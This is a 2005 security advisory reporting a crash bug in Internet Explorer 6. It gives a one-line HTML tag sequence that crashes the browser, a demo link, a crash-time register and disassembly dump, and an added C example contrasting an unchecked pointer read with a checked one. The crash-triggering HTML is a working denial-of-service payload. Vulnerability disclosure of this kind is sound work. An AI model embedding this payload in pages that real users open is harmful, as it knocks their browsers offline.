[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
---------------------------------------------------
| BuHa Security-Advisory #6 | Dec 24th, 2005 |
---------------------------------------------------
| Vendor | M$ Internet Explorer 6.0 |
| URL | http://www.microsoft.com/windows/ie/ |
| Version | <= 6.0.2900.2180.xpsp_sp2 |
| Risk | Low (DoS - Null Pointer Dereference) |
---------------------------------------------------
o Description:
=============
Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.
Visit http://www.microsoft.com/windows/ie/default.mspx or
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.
o Denial of Service: <mshtml.dll>#7d6d8eba
===================
The following HTML code forces M$ IE 6 to crash:
> <acronym><dd><h5><applet></caption></applet><li></h1>
Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1132900617750-7d6d8eba.html
These are the register values and the ASM dump at the time of the access
violation:
eax=00000000 ebx=01295390 ecx=00000000 edx=00000000 esi=0012d230
edi=01290720 eip=7d6d8eba esp=0012cd08 ebp=00000000
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
7d6d8e84 894c2414 mov [esp+0x14],ecx
7d6d8e88 8b8ea4000000 mov ecx,[esi+0xa4]
7d6d8e8e 24fe and al,0xfe
7d6d8e90 57 push edi
7d6d8e91 89542410 mov [esp+0x10],edx
7d6d8e95 8954241c mov [esp+0x1c],edx
7d6d8e99 88442420 mov [esp+0x20],al
7d6d8e9d e89912e5ff call mshtml+0x7a13b (7d52a13b)
7d6d8ea2 8b4c2428 mov ecx,[esp+0x28]
7d6d8ea6 68b2a06e7d push 0x7d6ea0b2
7d6d8eab 8bf8 mov edi,eax
7d6d8ead e89bb7e5ff call mshtml+0x8464d (7d53464d)
7d6d8eb2 50 push eax
7d6d8eb3 8bcf mov ecx,edi
7d6d8eb5 e8dfebfdff call mshtml+0x207a99 (7d6b7a99)
FAULT ->7d6d8eba 668b500c mov dx,[eax+0xc]
ds:0023:0000000c=????
7d6d8ebe 6685d2 test dx,dx
7d6d8ec1 7c39 jl mshtml+0x228efc (7d6d8efc)
7d6d8ec3 833d50e3747d01 cmp dword ptr [mshtml+0x29e350 (7d74e350)],0x1
7d6d8eca 0fbffa movsx edi,dx
7d6d8ecd 7513 jnz mshtml+0x228ee2 (7d6d8ee2)
7d6d8ecf a14ce3747d mov eax,[mshtml+0x29e34c (7d74e34c)]
7d6d8ed4 8b484c mov ecx,[eax+0x4c]
7d6d8ed7 8b4134 mov eax,[ecx+0x34]
7d6d8eda 8d147f lea edx,[edi+edi*2]
7d6d8edd 8b3c90 mov edi,[eax+edx*4]
7d6d8ee0 eb23 jmp mshtml+0x228f05 (7d6d8f05)
The access violation results in a null pointer dereference and is not
exploitable.
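The dump above shows the classic shape of this bug class: the call at 7d6d8eb5 returns 0 in eax, and the very next instruction reads a 16-bit field at offset 0xc through that pointer. The C below is an added illustration of that pattern next to its checked form; it is not Microsoft's code, and the struct layout, tag ids and function names are hypothetical, chosen only so that the 16-bit field lands at offset 0xc like the one read into dx.

```c
/*
 * Added example, not mshtml.dll code: a lookup that can return NULL,
 * a caller that reads a field through it unchecked (the faulting pattern),
 * and the same caller with the check the crash is missing.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical node layout; only the offset of `kind` matters here. */
typedef struct layout_node {
    uint32_t reserved0;   /* offset 0x0 */
    uint32_t reserved1;   /* offset 0x4 */
    uint32_t reserved2;   /* offset 0x8 */
    int16_t  kind;        /* offset 0xc: the 16-bit value the dump loads into dx */
    int16_t  pad;
} layout_node;

/* Constructed sample table of nodes, indexed by a made-up tag id. */
enum { TAG_ACRONYM = 0, TAG_DD, TAG_H5, TAG_APPLET, TAG_COUNT };
static layout_node g_nodes[TAG_COUNT] = {
    {0, 0, 0, 1, 0}, {0, 0, 0, 2, 0}, {0, 0, 0, 3, 0}, {0, 0, 0, -4, 0}
};

/* Lookup that can fail, standing in for the call that returned 0 in eax. */
static layout_node *find_node(int tag_id)
{
    if (tag_id < 0 || tag_id >= TAG_COUNT)
        return NULL;          /* e.g. a close tag with no matching open tag */
    return &g_nodes[tag_id];
}

/* Vulnerable pattern: return value dereferenced without a check.
 * With an unknown tag id this reads address 0xc and the process dies
 * with an access violation, exactly as IE does on the HTML above. */
int node_kind_unchecked(int tag_id)
{
    layout_node *n = find_node(tag_id);
    return n->kind;           /* mov dx,[eax+0xc] with eax == 0 */
}

/* Hardened pattern: check the pointer and report failure out of band,
 * so the caller can abandon the layout pass instead of crashing. */
int node_kind_checked(int tag_id, int16_t *kind_out)
{
    layout_node *n = find_node(tag_id);
    if (n == NULL)
        return -1;
    *kind_out = n->kind;
    return 0;
}

/* Convenience wrapper: the kind, or `fallback` when the lookup fails. */
int16_t node_kind_or(int tag_id, int16_t fallback)
{
    int16_t k = fallback;
    (void)node_kind_checked(tag_id, &k);
    return k;
}

/* Offset of the field the faulting instruction reads (0xc). */
size_t kind_field_offset(void)
{
    return offsetof(layout_node, kind);
}

int main(void)
{
    printf("kind field offset: 0x%zx\n", kind_field_offset());
    printf("checked lookup of H5      -> kind=%d\n", node_kind_or(TAG_H5, 0x7fff));
    printf("checked lookup of tag 99  -> kind=%d (fallback)\n", node_kind_or(99, 0x7fff));
    /* node_kind_unchecked(99) would dereference NULL here. */
    return 0;
}
```

The `test dx,dx` / `jl` pair right after the faulting load shows the code does inspect the value it reads; what it never inspects is the pointer it reads it through, which is the check `node_kind_checked` adds.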
o Vulnerable versions:
=====================
The DoS vulnerability was successfully tested on:
> M$ IE 6 SP2 - Win XP Pro SP2
> M$ IE 6 - Win 2k SP4
o Disclosure Timeline:
=====================
26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.
o Solution:
==========
There is no patch yet. The vulnerability will be fixed in an upcoming
service pack according to the Microsoft Security Response Center.
o Credits:
=========
Christian Deneke <bugtraq@xxxxxxxxxx>
- --
Thomas Waldegger <bugtraq@xxxxxxxxxxxx>
BuHa-Security Community - http://buha.info/board/
If you have questions, suggestions or criticism about the advisory, feel
free to send me a mail. The address 'bugtraq@xxxxxxxxxxxx' is more a
spam address than a regular mail address; therefore it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.
Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.
Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-3.txt
-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/
iD8DBQFDrdu6kCo6/ctnOpYRAs1cAKCOabmBR3EtFBoMz/wKinVVpU/q/ACeK2kG
A4pamspAa8+NY9TDiCz738s=
=Wga9
-----END PGP SIGNATURE-----